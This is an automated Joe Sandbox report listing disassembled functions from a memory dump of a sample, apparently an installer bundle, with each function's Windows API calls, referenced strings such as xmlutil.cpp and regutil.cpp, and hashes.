API String ID: 2781989572-961924111
Opcode ID: 0a8648280fd69f4bead4ea22a05e6f949d0d478928901313d5414e35127ad4c4
Instruction ID: 2944269c17fff23b0aca5e5603671a30403bf186f72a28efa3b0c12b532b4661
Opcode Fuzzy Hash: 0a8648280fd69f4bead4ea22a05e6f949d0d478928901313d5414e35127ad4c4
Instruction Fuzzy Hash: D141C776E002166AD7309BBC8C45BBF7F65FF90700FA4491BA501A7380E936DE41A7A1

Function 005D36CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 005D36E6
SysAllocString.OLEAUT32(?), ref: 005D36F6
VariantClear.OLEAUT32(?), ref: 005D37D5

Strings

xmlutil.cpp, xrefs: 005D370E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 0f6e9cc81778645bf41f735a29c6ccbbc68597340305ba21772d3545ea808870
Instruction ID: ea5752bf66cc20641f8eca613770ac0f29964418ee0b30e7758da8ae5932285e
Opcode Fuzzy Hash: 0f6e9cc81778645bf41f735a29c6ccbbc68597340305ba21772d3545ea808870
Instruction Fuzzy Hash: F94167B5A016259BCB209FA8C888EAABFA8FF45710F1545A7FC05EB311D634DE00DB91

Function 005D0E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,005B8E1B), ref: 005D0EAA
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,005B8E1B,00000000), ref: 005D0EC8
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,005B8E1B,00000000,00000000,00000000), ref: 005D0F1E

Strings

regutil.cpp, xrefs: 005D0EEE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: a247797b26c6b1b230445d2672932221f786ea889ec5e545bdd8250abe461ab2
Instruction ID: cf8d2187ea7746b569269ae211543d5a2bae6d48248e466182932369b43237b0
Opcode Fuzzy Hash: a247797b26c6b1b230445d2672932221f786ea889ec5e545bdd8250abe461ab2
Instruction Fuzzy Hash: 8731827690112AFBEB318B98CD84AAEBF6DFF04750F251467BD05EB390D6718E0096A0

Function 005B8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,005B8E57,00000000,00000000), ref: 005B8BD4

Strings

Failed to ensure there is space for related bundles., xrefs: 005B8B87
Failed to open uninstall key for potential related bundle: %ls, xrefs: 005B8B43
Failed to initialize package from related bundle id: %ls, xrefs: 005B8BBA

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: db7ca2de1a68e0c5644fe4f423f0d9f961c67f7ac07fb5200bca5625ddada5c3
Instruction ID: ffe493adbfe73dcd13ed03da989b6820593cb65d744bb2fb7bc6fc5d5fc10a0b
Opcode Fuzzy Hash: db7ca2de1a68e0c5644fe4f423f0d9f961c67f7ac07fb5200bca5625ddada5c3
Instruction Fuzzy Hash: 3E21717294061AFBDF229E54CC4AFFE7F68FF04711F105156F900A6190DB71AA60EB90

Function 00593B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00591474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005913B8), ref: 00593B33
HeapReAlloc.KERNEL32(00000000,?,00591474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005913B8,000001C7,00000100,?,80004005,00000000), ref: 00593B3A

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

Part of subcall function 00593BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BDB
Part of subcall function 00593BD3: HeapSize.KERNEL32(00000000,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BE2

_memcpy_s.LIBCMT ref: 00593B86

Strings

memutil.cpp, xrefs: 00593BC7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: b25ff5eacd2ebb4494e6321c1b545c14761feb8616c66aced953f8a73417e09f
Instruction ID: 41088c92cf6a2bc8156dd6fefd2c907095a447c2a80d8e293efde34aad772c8d
Opcode Fuzzy Hash: b25ff5eacd2ebb4494e6321c1b545c14761feb8616c66aced953f8a73417e09f
Instruction Fuzzy Hash: 7211B13160551AEFDF226F68CC48D6E3E5BFB80764B054625FC149B262E735CF1496D0

Function 005D894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 005D8991
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005D89B9
GetLastError.KERNEL32 ref: 005D89C3

Strings

inetutil.cpp, xrefs: 005D89E4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: bbd833702a97e2cff3b8e777b85f106fe9553c7be1920129d4438abe9bed6304
Instruction ID: ee96a03e78d4a630ed8633919e5c7548b0d671909f98b5b5a3f4ffb67d419457
Opcode Fuzzy Hash: bbd833702a97e2cff3b8e777b85f106fe9553c7be1920129d4438abe9bed6304
Instruction Fuzzy Hash: 8511DA73902129A7D731DBA98C49BBFBFA8BB44750F020117AE44F7200EA249D0497E2

Function 005A3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005A3FB5,feclient.dll,?,00000000,?,?,?,00594B12), ref: 005A3B42

Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D112B
Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 005D1163

Strings

Logging, xrefs: 005A3AD4
feclient.dll, xrefs: 005A3AAB
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 005A3AB7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 6fdf1383177445fc6fd47c579cd18c438bff8535b981f33246738fdac8f04ea4
Instruction ID: b407d4f3fb57cfb566edbf4624c9c7da475562324fed439f9b9c3cc4c1b09e81
Opcode Fuzzy Hash: 6fdf1383177445fc6fd47c579cd18c438bff8535b981f33246738fdac8f04ea4
Instruction Fuzzy Hash: 31119332A4020CBBDB21DB95DD86EAEBFBAFB52704F504066F6009B191D6719F81D760

Function 005D0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(005B12CF,00000000,00000000,?,?,?,005D0013,005B12CF,005B12CF,?,00000000,0000FDE9,?,005B12CF,8007139F,Invalid operation for this state.), ref: 005D0776
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,005D0013,005B12CF,005B12CF,?,00000000,0000FDE9,?,005B12CF,8007139F), ref: 005D07B2
GetLastError.KERNEL32(?,?,005D0013,005B12CF,005B12CF,?,00000000,0000FDE9,?,005B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005D07BC

Strings

logutil.cpp, xrefs: 005D07ED

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 9559ec2ab5ac33ee6fa8ff599c84f33696a1a4fb80e5783a116d23bb4c842bcf
Instruction ID: 49a308d55a1705aa3d519974bd36195f8a5d85819ea176ca7d2b4107f2ad61c6
Opcode Fuzzy Hash: 9559ec2ab5ac33ee6fa8ff599c84f33696a1a4fb80e5783a116d23bb4c842bcf
Instruction Fuzzy Hash: 84115472A41125EB97309A698D44AABBE68FB54760F114617FD05DB380E664AD00DAE0

Function 0059120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0059523F,00000000,?), ref: 00591248
GetLastError.KERNEL32(?,?,?,0059523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00591252

Strings

apputil.cpp, xrefs: 00591273
ignored , xrefs: 00591217

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: 9d72a88bee1a31e2ebc82fd4b4ca627132cfe4f001c5c8fa6af473b113005d2e
Instruction ID: 4a59ece6436d7b03fd89d45e0365533d1577ae15ef31ea8b49dc5e42712caf17
Opcode Fuzzy Hash: 9d72a88bee1a31e2ebc82fd4b4ca627132cfe4f001c5c8fa6af473b113005d2e
Instruction Fuzzy Hash: E411467A90153AEB9F21DB9AD905D9EBFACBF44750B110156FD04E7210E7309E00D6A8

Function 005BD1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,005BD3EE,00000000,00000000,00000000,?), ref: 005BD1C3
ReleaseMutex.KERNEL32(?,?,005BD3EE,00000000,00000000,00000000,?), ref: 005BD24A

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

Strings

Failed to allocate memory for message data, xrefs: 005BD212
NetFxChainer.cpp, xrefs: 005BD208

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: a544fcab6c26c49ae7fe07c4f9c2716a169102f17a43b1e1c00b094d7f439d7f
Instruction ID: fcd591f7c53eea2d236cdfad1551b13ceb5e29dcec2e28a638880016d5e1337a
Opcode Fuzzy Hash: a544fcab6c26c49ae7fe07c4f9c2716a169102f17a43b1e1c00b094d7f439d7f
Instruction Fuzzy Hash: 2511BFB5200216EFCB158F68D885EA9BBF5FF49720F104165FA149B391C731A810CBA4

Function 00591F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(0059428F,0059548E,?,00000000,00000000,00000000,?,80070656,?,?,?,005AE75C,00000000,0059548E,00000000,80070656), ref: 00591F9A
GetLastError.KERNEL32(?,?,?,005AE75C,00000000,0059548E,00000000,80070656,?,?,005A40BF,0059548E,?,80070656,00000001,crypt32.dll), ref: 00591FA7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,005AE75C,00000000,0059548E,00000000,80070656,?,?,005A40BF,0059548E), ref: 00591FEE

Strings

strutil.cpp, xrefs: 00591FCB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 8d76f2d49a33094c51c1079459e876dc8a5a51c201b496bb029ab739bd6eb5cc
Instruction ID: 4d4c100b72490a1ec26c31ad74f3ed08dd55ce6882b5d08b92f22a56819b79c4
Opcode Fuzzy Hash: 8d76f2d49a33094c51c1079459e876dc8a5a51c201b496bb029ab739bd6eb5cc
Instruction Fuzzy Hash: 39013CB695113AFBDB208B95DD09ADABEACEB04750F114166BD04E6250E7309E009AE0

Function 005A0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 005A0791

Strings

Failed to open registration key., xrefs: 005A0748
Failed to update resume mode., xrefs: 005A0762
Failed to update name and publisher., xrefs: 005A077B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
API String ID: 47109696-1865096027
Opcode ID: 52d4a87be1c2b73a8e8c488f3ee570da6f25387fd9fb4734d3830a7b167a2d32
Instruction ID: 4fcb4630c966473002301d551c6bc8f377d589d51ee78761b3e37a31999096c7
Opcode Fuzzy Hash: 52d4a87be1c2b73a8e8c488f3ee570da6f25387fd9fb4734d3830a7b167a2d32
Instruction Fuzzy Hash: 9001D432A51629F7CF225A94CC46FAEBF69FB41B20F100156F900B6290D771BE50BBD4

Function 005D4DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(005DB500,40000000,00000001,00000000,00000002,00000080,00000000,005A04BF,00000000,?,0059F4F4,?,00000080,005DB500,00000000), ref: 005D4DCB
GetLastError.KERNEL32(?,0059F4F4,?,00000080,005DB500,00000000,?,005A04BF,?,00000094,?,?,?,?,?,00000000), ref: 005D4DD8
CloseHandle.KERNEL32(00000000,00000000,?,0059F4F4,?,0059F4F4,?,00000080,005DB500,00000000,?,005A04BF,?,00000094), ref: 005D4E2C

Strings

fileutil.cpp, xrefs: 005D4DFC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: 6c29bc465ab0987e259e36fda431cce90476797c1e5af67ae519ca3718d8ba07
Instruction ID: 56abc8af4368be9cc31ca92446cd1c95ba652bce70f1b66d1c48f248d340e1d2
Opcode Fuzzy Hash: 6c29bc465ab0987e259e36fda431cce90476797c1e5af67ae519ca3718d8ba07
Instruction Fuzzy Hash: 9201B133641125B7D7325A6D9C09B5B3F59FB41B71F064213FF20AA2D0D7718C01AAA2

Function 005D497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,005B8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 005D49AE
GetLastError.KERNEL32(?,005B8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 005D49BB

Strings

fileutil.cpp, xrefs: 005D498F, 005D49DF

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 7936fed49feaacc7aa256893e3a3d946d03cece3762f0b88123fa11a6c54ed8b
Instruction ID: 97e806891825140a339d29ac092e12cad15e156a23d57677c69c78ec434af1c9
Opcode Fuzzy Hash: 7936fed49feaacc7aa256893e3a3d946d03cece3762f0b88123fa11a6c54ed8b
Instruction Fuzzy Hash: 4A01A232682129F7E731269A5C1EF7B2E59BB40BA0F124213FF41AA2C0C7754D006AE1

Function 005B6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(005B6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,005B6AFD,00000000), ref: 005B6C13
GetLastError.KERNEL32(?,?,?,?,?,?,005B6AFD,00000000), ref: 005B6C1D

Strings

Failed to stop wusa service., xrefs: 005B6C4B
msuuser.cpp, xrefs: 005B6C41

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuuser.cpp
API String ID: 4114567744-2259829683
Opcode ID: 468b3db78e248d74fb2157f760c8e6af2d483d6095432bedd2bc2cb135c69a87
Instruction ID: a2e3053489376e494c7df60e339942a7efa713ae554889d8e4359c47a6306aa9
Opcode Fuzzy Hash: 468b3db78e248d74fb2157f760c8e6af2d483d6095432bedd2bc2cb135c69a87
Instruction Fuzzy Hash: B501D073A41239A7DB209B659C09AEF7FA4FB48B10F014126FD44BB180DA34AD0596E5

Function 005D3929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005D396E
SysFreeString.OLEAUT32(00000000), ref: 005D39A1

Strings

xmlutil.cpp, xrefs: 005D393F, 005D3985
`Dv, xrefs: 005D39A1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: 9fe32fe25e381dc68a833114eb108af414b0a0732e0355689c87794bff02a780
Instruction ID: cdf797013c4d4d3221ac3fcc0d59107a61baa935611deb9a3304649e100699b0
Opcode Fuzzy Hash: 9fe32fe25e381dc68a833114eb108af414b0a0732e0355689c87794bff02a780
Instruction Fuzzy Hash: 6B017C3124621AABEB305F5C8808E7A7B99BF51B60F110937F940A7340C6B4CD009692

Function 005D39AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005D39F4
SysFreeString.OLEAUT32(00000000), ref: 005D3A27

Strings

xmlutil.cpp, xrefs: 005D39C5, 005D3A0B
`Dv, xrefs: 005D3A27

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: b126a8cd88450888d37947c86a365c8e9641a642dc0a795d5c7bba74a4a3a4ab
Instruction ID: 444715f3a8ad285a04a37e6172a250adfe69b8d1f1a1dd3609796c71db15ea70
Opcode Fuzzy Hash: b126a8cd88450888d37947c86a365c8e9641a642dc0a795d5c7bba74a4a3a4ab
